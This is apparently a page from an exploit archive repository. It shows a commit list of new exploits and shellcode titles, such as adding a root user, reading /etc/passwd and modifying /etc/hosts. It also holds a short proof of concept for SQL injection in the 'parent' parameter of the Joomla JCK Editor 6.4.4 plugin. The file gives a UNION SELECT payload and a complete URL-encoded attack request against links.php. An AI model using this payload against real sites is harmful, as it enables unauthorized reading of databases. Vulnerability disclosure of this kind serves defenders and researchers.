f1d68507cd
7 changes to exploits/shellcodes XAMPP Control Panel 3.2.2 - Denial of Service (PoC) Notebook Pro 2.0 - Denial Of Service (PoC) Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC) Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC) CA Release Automation NiMi 6.5 - Remote Command Execution Gitweb 1.7.3.3 - Cross-Site Scripting gitWeb 1.7.3.3 - Cross-Site Scripting Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes) Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes) Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes) Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes) Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes) Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes) Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes) Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
14 lines
No EOL
587 B
Text
14 lines
No EOL
587 B
Text
# Title: Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection
|
|
# Date: 2018-09-14
|
|
# Exploit Author: Hamza Megahed
|
|
# Vendor Homepage:https://www.joomla.org/
|
|
# Download: https://arkextensions.com/products/jck-editor
|
|
# Version: 6.4.4
|
|
# Tested on: Ubuntu, FireFox,
|
|
# CVE: N/A
|
|
|
|
# Parameter = parent
|
|
# Payload = " UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa
|
|
# Poc:
|
|
|
|
Test = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa |